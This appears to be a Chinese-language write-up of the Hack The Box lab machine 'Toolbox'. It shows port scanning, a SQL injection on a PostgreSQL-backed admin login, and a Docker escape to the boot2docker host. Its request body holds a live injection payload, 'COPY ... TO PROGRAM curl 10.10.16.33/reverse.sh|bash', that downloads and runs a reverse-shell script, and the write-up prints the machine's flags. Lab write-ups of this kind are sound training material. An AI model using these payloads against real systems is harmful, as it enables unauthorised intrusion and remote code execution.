[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升

Information Gathering

IP Address Opening Ports
10.10.10.236 TCP:21,22,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49669

$ ip='10.10.10.236'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b1aa18199eaf79602192e6e97045a3f (RSA)
|   256 a24b5ac70ff399a13aca7d542876b2dd (ECDSA)
|_  256 ea08966023e2f44f8d05b31841352339 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PostgreSQL Injection RCE

# echo '10.10.10.236 megalogistic.com admin.megalogistic.com'>>/etc/hosts

https://megalogistic.com/

https://admin.megalogistic.com/

复制代码
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=admin'&password=1

$ python3 /opt/sqlmap/sqlmap.py -u http://admin.megalogistic.com --batch --force-ssl --dbms=PostgreSQL -X POST --data 'username=admin&password=11111'

复制代码
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=';COPY+(SELECT+'test')+TO+PROGRAM+'curl+10.10.16.33/reverse.sh|bash';--+-&password=1

User.txt

f0183e44378ea9774433e2ca6ac78c6a

Privilege Escalation:Docker Escape boot2docker

$ uname -a

$ SHELL=/bin/bash script -q /dev/null

postgres@bc56e3cc55e9:/tmp$ ssh docker@172.17.0.1

docker@box:~$ cat /c/Users/Administrator/Desktop/root.txt

Root.txt

cc9a0b76ac17f8f475250738b96261b3

相关推荐
IT成长日记2 小时前
【Docker基础】Docker数据持久化与卷(Volume)介绍
运维·docker·容器·数据持久化·volume·
热爱生活的猴子2 小时前
阿里云服务器正确配置 Docker 国内镜像的方法
服务器·阿里云·docker
物联网老王4 小时前
Ubuntu Linux Cursor 安装与使用一
linux·运维·ubuntu
艾伦_耶格宇5 小时前
【ACP】阿里云云计算高级运维工程师--ACP
运维·阿里云·云计算
FrankYoou6 小时前
Jenkins 与 GitLab CI/CD 的核心对比
java·docker
一位摩羯座DBA6 小时前
Redhat&Centos挂载镜像
linux·运维·centos
隆里卡那唔6 小时前
在dify中通过http请求neo4j时为什么需要将localhost变为host.docker.internal
http·docker·neo4j
疯子的模样6 小时前
Docker 安装 Neo4j 保姆级教程
docker·容器·neo4j
cui_win7 小时前
【网络】Linux 内核优化实战 - net.core.flow_limit_table_len
linux·运维·网络
风清再凯7 小时前
自动化工具ansible,以及playbook剧本
运维·自动化·ansible